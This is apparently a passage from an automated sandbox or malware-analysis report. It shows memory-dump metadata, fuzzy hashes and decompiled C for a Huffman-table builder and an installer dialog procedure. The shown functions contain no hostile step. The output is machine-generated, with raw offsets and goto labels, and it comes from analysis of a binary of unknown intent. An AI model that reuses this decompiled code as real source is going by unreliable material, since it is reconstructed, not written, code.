                                                                            0x0040746a
                                                                            0x004074a5
                                                                            0x004074a5
                                                                            0x00000000
                                                                            0x0040746c
                                                                            0x0040746c
                                                                            0x0040746c
                                                                            0x00407472
                                                                            0x00407475
                                                                            0x00407477
                                                                            0x004074ac
                                                                            0x004074ae
                                                                            0x00000000
                                                                            0x004074ae
                                                                            0x00000000
                                                                            0x00407477
                                                                            0x00000000
                                                                            0x00406ab6
                                                                            0x00407484
                                                                            0x00000000
                                                                            0x00407484
                                                                            0x00406e98
                                                                            0x00406e9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e9c
                                                                            0x00406e9c
                                                                            0x00406e9f
                                                                            0x00000000
                                                                            0x00406e9f
                                                                            0x00406de4
                                                                            0x00406da5
                                                                            0x00407489
                                                                            0x0040748c
                                                                            0x0040748e
                                                                            0x00407497
                                                                            0x0040749d
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040755C, Relevance: .3, Instructions: 300COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                            0x00407567
                                                                            0x0040756f
                                                                            0x00407573
                                                                            0x00407575
                                                                            0x00407578
                                                                            0x0040757a
                                                                            0x0040757a
                                                                            0x0040757c
                                                                            0x00407583
                                                                            0x00407585
                                                                            0x00407585
                                                                            0x0040758b
                                                                            0x004075a0
                                                                            0x004075a8
                                                                            0x004075aa
                                                                            0x004075ac
                                                                            0x004075af
                                                                            0x004075b0
                                                                            0x004075b0
                                                                            0x004075b6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075b8
                                                                            0x004075bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075bb
                                                                            0x004075bf
                                                                            0x004075c2
                                                                            0x004075c4
                                                                            0x004075c4
                                                                            0x004075c7
                                                                            0x004075cd
                                                                            0x004075ce
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075ce
                                                                            0x004075d3
                                                                            0x004075d6
                                                                            0x004075d8
                                                                            0x004075d8
                                                                            0x004075de
                                                                            0x004075e0
                                                                            0x004075f1
                                                                            0x004075e4
                                                                            0x004075e8
                                                                            0x0040788d
                                                                            0x00000000
                                                                            0x0040788d
                                                                            0x004075ee
                                                                            0x004075ef
                                                                            0x004075ef
                                                                            0x004075f7
                                                                            0x004075fa
                                                                            0x004075fe
                                                                            0x00407600
                                                                            0x00407602
                                                                            0x00407605
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040760d
                                                                            0x00407613
                                                                            0x00407615
                                                                            0x00407617
                                                                            0x00407618
                                                                            0x0040762d
                                                                            0x0040762d
                                                                            0x00407630
                                                                            0x00407632
                                                                            0x00407632
                                                                            0x00407634
                                                                            0x00407639
                                                                            0x0040763b
                                                                            0x00407642
                                                                            0x00407644
                                                                            0x0040764c
                                                                            0x0040764c
                                                                            0x0040764e
                                                                            0x0040764f
                                                                            0x0040765e
                                                                            0x00407662
                                                                            0x00407666
                                                                            0x00407669
                                                                            0x0040766c
                                                                            0x00407671
                                                                            0x00407674
                                                                            0x0040767a
                                                                            0x00407681
                                                                            0x00407687
                                                                            0x00407880
                                                                            0x00407880
                                                                            0x00407885
                                                                            0x00407894
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407885
                                                                            0x00407694
                                                                            0x00407697
                                                                            0x0040769a
                                                                            0x0040769d
                                                                            0x004076a1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076ac
                                                                            0x004076af
                                                                            0x004076b0
                                                                            0x004076b2
                                                                            0x004076b8
                                                                            0x004076bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076c1
                                                                            0x004076c2
                                                                            0x004076c5
                                                                            0x004076c8
                                                                            0x004076cb
                                                                            0x004076d1
                                                                            0x004076d3
                                                                            0x004076d3
                                                                            0x004076db
                                                                            0x004076df
                                                                            0x004076e4
                                                                            0x00407709
                                                                            0x0040770f
                                                                            0x00407711
                                                                            0x00407713
                                                                            0x00407716
                                                                            0x0040771f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076e6
                                                                            0x004076e6
                                                                            0x004076ef
                                                                            0x004076f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407704
                                                                            0x00407704
                                                                            0x00407707
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076f7
                                                                            0x004076fa
                                                                            0x004076fc
                                                                            0x00407700
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407702
                                                                            0x00407702
                                                                            0x00000000
                                                                            0x00407704
                                                                            0x00407728
                                                                            0x0040772e
                                                                            0x00407738
                                                                            0x0040773a
                                                                            0x0040773f
                                                                            0x00407741
                                                                            0x00407777
                                                                            0x00407743
                                                                            0x00407743
                                                                            0x00407746
                                                                            0x00407749
                                                                            0x00407753
                                                                            0x00407756
                                                                            0x0040775d
                                                                            0x00407768
                                                                            0x0040776f
                                                                            0x0040776f
                                                                            0x00407779
                                                                            0x0040777c
                                                                            0x0040777e
                                                                            0x00407784
                                                                            0x00407784
                                                                            0x0040778d
                                                                            0x00407790
                                                                            0x00407795
                                                                            0x004077a4
                                                                            0x004077ac
                                                                            0x004077b1
                                                                            0x004077d5
                                                                            0x004077dd
                                                                            0x004077e1
                                                                            0x004077e7
                                                                            0x004077b3
                                                                            0x004077c1
                                                                            0x004077c4
                                                                            0x004077ca
                                                                            0x004077ca
                                                                            0x004077eb
                                                                            0x004077a6
                                                                            0x004077a6
                                                                            0x004077a6
                                                                            0x004077fc
                                                                            0x00407800
                                                                            0x0040780c
                                                                            0x00407807
                                                                            0x0040780a
                                                                            0x0040780a
                                                                            0x00407814
                                                                            0x00407819
                                                                            0x00407821
                                                                            0x0040781d
                                                                            0x0040781f
                                                                            0x0040781f
                                                                            0x00407827
                                                                            0x00407829
                                                                            0x00407830
                                                                            0x0040783a
                                                                            0x00407844
                                                                            0x00407860
                                                                            0x00407864
                                                                            0x004076a9
                                                                            0x004076af
                                                                            0x004076b0
                                                                            0x004076b2
                                                                            0x004076b8
                                                                            0x004076bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407846
                                                                            0x00407846
                                                                            0x00407846
                                                                            0x0040784b
                                                                            0x00407854
                                                                            0x0040785d
                                                                            0x00000000
                                                                            0x0040785d
                                                                            0x0040786a
                                                                            0x0040786a
                                                                            0x0040786d
                                                                            0x00407874
                                                                            0x00407877
                                                                            0x00000000
                                                                            0x0040769a
                                                                            0x0040761a
                                                                            0x0040761c
                                                                            0x0040761c
                                                                            0x00407620
                                                                            0x00407623
                                                                            0x00407624
                                                                            0x00407624
                                                                            0x00000000
                                                                            0x0040761c
                                                                            0x00407590
                                                                            0x00407596
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404F06, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                            0x00404f0d
                                                                            0x00404f26
                                                                            0x00404f2b
                                                                            0x00404f33
                                                                            0x00404f39
                                                                            0x00404f4f
                                                                            0x00404f52
                                                                            0x0040517d
                                                                            0x00405184
                                                                            0x00405198
                                                                            0x00405186
                                                                            0x00405188
                                                                            0x0040518b
                                                                            0x0040518c
                                                                            0x00405193
                                                                            0x00405193
                                                                            0x004051a4
                                                                            0x004051b2
                                                                            0x004051b5
                                                                            0x004051cb
                                                                            0x00405240
                                                                            0x00405243
                                                                            0x00405245
                                                                            0x0040524f
                                                                            0x0040525d
                                                                            0x0040525d
                                                                            0x0040525f
                                                                            0x00405269
                                                                            0x0040526f
                                                                            0x00405272
                                                                            0x00405275
                                                                            0x00405290
                                                                            0x00405277
                                                                            0x00405281
                                                                            0x00405281
                                                                            0x00405275
                                                                            0x00405269
                                                                            0x00000000
                                                                            0x00405243
                                                                            0x004051d0
                                                                            0x004051db
                                                                            0x004051e0
                                                                            0x004051e7
                                                                            0x004051ec
                                                                            0x004051f0
                                                                            0x004051fb
                                                                            0x004051fb
                                                                            0x004051ff
                                                                            0x00405203
                                                                            0x00405207
                                                                            0x0040521a
                                                                            0x00405209
                                                                            0x00405209
                                                                            0x00405210
                                                                            0x00405216
                                                                            0x00405212
                                                                            0x00405212
                                                                            0x00405212
                                                                            0x00405210
                                                                            0x0040521e
                                                                            0x00405220
                                                                            0x00405233
                                                                            0x00405236
                                                                            0x00405239
                                                                            0x00405239
                                                                            0x00405203
